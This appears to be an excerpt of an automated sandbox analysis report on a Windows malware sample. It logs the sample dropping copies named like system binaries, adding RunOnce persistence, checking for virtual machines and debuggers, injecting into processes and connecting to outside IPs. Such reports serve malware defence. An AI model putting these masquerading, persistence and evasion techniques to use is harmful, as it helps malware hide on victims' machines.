                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:W;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW;
                      Source: C:\Windows\Resources\spoolsv.exeUnpacked PE file: 3.2.spoolsv.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:W;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW;
                      Source: C:\Windows\Resources\spoolsv.exeUnpacked PE file: 5.2.spoolsv.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:W;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW;
                      Source: C:\Windows\Resources\Themes\explorer.exeUnpacked PE file: 11.2.explorer.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:W;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW;
                      Source: C:\Windows\Resources\svchost.exeUnpacked PE file: 14.2.svchost.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:W;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW;
                      Source: explorer.exe.0.drStatic PE information: real checksum: 0x4bf451a should be: 0xc72d7
                      Source: spoolsv.exe.2.drStatic PE information: real checksum: 0x4bf451a should be: 0xba732
                      Source: svchost.exe.3.drStatic PE information: real checksum: 0x4bf451a should be: 0xc498d
                      Source: file.exeStatic PE information: real checksum: 0x4bf451a should be: 0xc4285
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030A0B00 push 0000003Eh; ret 0_3_030A0B21
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030A1110 push edi; ret 0_3_030A1131
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0309C03D push edx; ret 0_3_0309C041
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030A268F push 0000003Eh; ret 0_3_030A26B9
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0309A4F9 push ebp; iretd 0_3_0309A508
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030991C2 push edx; ret 0_3_030991D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030991C2 push edx; ret 0_3_030991D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030991C2 push edx; ret 0_3_030991D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030991C2 push edx; ret 0_3_030991D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0309921B push ebp; iretd 0_3_03099230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0309921B push ebp; iretd 0_3_03099230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0309921B push ebp; iretd 0_3_03099230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0309921B push ebp; iretd 0_3_03099230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030993A2 push 0000003Eh; ret 0_3_030993AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030993A2 push 0000003Eh; ret 0_3_030993AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030993A2 push 0000003Eh; ret 0_3_030993AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030993A2 push 0000003Eh; ret 0_3_030993AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030991C2 push edx; ret 0_3_030991D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030991C2 push edx; ret 0_3_030991D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030991C2 push edx; ret 0_3_030991D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030991C2 push edx; ret 0_3_030991D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0309921B push ebp; iretd 0_3_03099230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0309921B push ebp; iretd 0_3_03099230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0309921B push ebp; iretd 0_3_03099230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0309921B push ebp; iretd 0_3_03099230
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030993A2 push 0000003Eh; ret 0_3_030993AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030993A2 push 0000003Eh; ret 0_3_030993AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030993A2 push 0000003Eh; ret 0_3_030993AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030993A2 push 0000003Eh; ret 0_3_030993AD
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030991C2 push edx; ret 0_3_030991D1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_3_030991C2 push edx; ret 0_3_030991D1
                      Source: file.exeStatic PE information: section name: entropy: 7.851401794337924
                      Source: file.exeStatic PE information: section name: .data entropy: 7.939460972036294
                      Source: explorer.exe.0.drStatic PE information: section name: entropy: 7.851401794337924
                      Source: explorer.exe.0.drStatic PE information: section name: .data entropy: 7.939460972036294
                      Source: spoolsv.exe.2.drStatic PE information: section name: entropy: 7.851401794337924
                      Source: spoolsv.exe.2.drStatic PE information: section name: .data entropy: 7.939460972036294
                      Source: svchost.exe.3.drStatic PE information: section name: entropy: 7.851401794337924
                      Source: svchost.exe.3.drStatic PE information: section name: .data entropy: 7.939460972036294

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                      Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                      Source: C:\Windows\System32\svchost.exeExecutable created and started: c:\windows\resources\themes\explorer.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeExecutable created and started: c:\windows\resources\svchost.exeJump to behavior
                      Source: C:\Windows\Resources\svchost.exeExecutable created and started: c:\windows\resources\spoolsv.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                      Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                      Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                      Source: C:\Windows\Resources\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccessJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ExplorerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                      Source: C:\Windows\Resources\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce SvchostJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004289D6 IsIconic,0_2_004289D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004289D6 IsIconic,0_2_004289D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004289D6 IsIconic,0_2_004289D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004289D6 IsIconic,0_2_004289D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004289D6 IsIconic,3_2_004289D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004289D6 IsIconic,3_2_004289D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004289D6 IsIconic,3_2_004289D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004289D6 IsIconic,3_2_004289D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CF34C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004CF34C
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD3A00_2_004FD3A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD3A00_2_004FD3A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD3A00_2_004FD3A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD3A00_2_004FD3A0
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004FD3A03_2_004FD3A0
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004FD3A03_2_004FD3A0
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004FD3A03_2_004FD3A0
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004FD3A03_2_004FD3A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403A5C sgdt fword ptr [eax]0_2_00403A5C
                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 615Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 358Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 8735Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: foregroundWindowGot 1468Jump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeWindow / User API: threadDelayed 783Jump to behavior
                      Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 734Jump to behavior
                      Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 5335Jump to behavior
                      Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 539Jump to behavior
                      Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 2600Jump to behavior
                      Source: C:\Windows\Resources\svchost.exeWindow / User API: foregroundWindowGot 1014Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
                      Source: C:\Windows\Resources\spoolsv.exeAPI coverage: 4.5 %
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FD3A00_2_004FD3A0
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004FD3A03_2_004FD3A0
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 5040Thread sleep count: 615 > 30Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 5040Thread sleep time: -615000s >= -30000sJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 1468Thread sleep count: 358 > 30Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 1468Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 5040Thread sleep count: 8735 > 30Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 5040Thread sleep time: -8735000s >= -30000sJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exe TID: 3636Thread sleep count: 783 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 4052Thread sleep count: 734 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 6596Thread sleep count: 5335 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 6596Thread sleep time: -5335000s >= -30000sJump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 4052Thread sleep count: 170 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 4052Thread sleep count: 539 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 6596Thread sleep count: 2600 > 30Jump to behavior
                      Source: C:\Windows\Resources\svchost.exe TID: 6596Thread sleep time: -2600000s >= -30000sJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exe TID: 4196Thread sleep count: 165 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042806E GetLogicalDriveStringsW,0_2_0042806E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004280EE GetSystemInfo,0_2_004280EE
                      Source: svchost.exe, 0000000E.00000003.2401893281.0000000002F40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VBoxService.exe
                      Source: file.exe, file.exe, 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2115854593.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2129489669.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, spoolsv.exe, 00000003.00000003.2145790917.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmp, svchost.exe, 00000004.00000003.2164302357.0000000003140000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2180546005.0000000002CE0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000002.2226170375.0000000000539000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000B.00000002.2356728288.0000000000539000.00000040.00000001.01000000.00000007.sdmp, explorer.exe, 0000000B.00000003.2330249640.0000000002C70000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                      Source: explorer.exe, 00000002.00000003.2276205227.0000000000947000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2775310270.000000000094D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2919375874.0000000000947000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2870048738.0000000000947000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2372188173.0000000000947000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2802016823.000000000094D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2666563377.000000000094D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538361591.000000000094D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2754525195.000000000094D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2395658189.000000000094D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2938609355.0000000000947000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000E.00000003.2401893281.0000000002F40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMWare
                      Source: file.exe, 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2115854593.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2129489669.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000003.2145790917.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmp, svchost.exe, 00000004.00000003.2164302357.0000000003140000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2180546005.0000000002CE0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000002.2226170375.0000000000539000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000B.00000002.2356728288.0000000000539000.00000040.00000001.01000000.00000007.sdmp, explorer.exe, 0000000B.00000003.2330249640.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2401893281.0000000002F40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                      Source: file.exe, 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2115854593.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2129489669.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000003.2145790917.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmp, svchost.exe, 00000004.00000003.2164302357.0000000003140000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000003.2180546005.0000000002CE0000.00000040.00001000.00020000.00000000.sdmp, spoolsv.exe, 00000005.00000002.2226170375.0000000000539000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000B.00000002.2356728288.0000000000539000.00000040.00000001.01000000.00000007.sdmp, explorer.exe, 0000000B.00000003.2330249640.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2401893281.0000000002F40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: JwaWinBase]DLL_Loader_VirtualMachine(Win32Typesh
                      Source: svchost.exe, 0000000E.00000003.2401893281.0000000002F40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VBoxService.exeU
                      Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-24755
                      Source: C:\Windows\Resources\spoolsv.exeAPI call chain: ExitProcess graph end nodegraph_3-24728
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\Resources\svchost.exeThread information set: HideFromDebugger
                      Source: C:\Windows\Resources\svchost.exeOpen window title or class name: ollydbg
                      Source: C:\Windows\Resources\svchost.exeFile opened: SIWDEBUG
                      Source: C:\Windows\Resources\svchost.exeFile opened: NTICE
                      Source: C:\Windows\Resources\svchost.exeFile opened: SICE

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 142.250.110.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 108.177.15.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 173.194.76.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 142.251.173.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 64.233.184.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 172.253.115.82 80Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: PID: 2820 base: 1C0000 value: 00Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: PID: 2820 base: 2192D8 value: 00Jump to behavior
                      Source: C:\Windows\System32\svchost.exeMemory written: PID: 2820 base: 21A1E8 value: 00Jump to behavior
                      Source: C:\Windows\System32\consent.exeMemory written: C:\Windows\System32\svchost.exe base: CEE7E7E398Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" ROJump to behavior
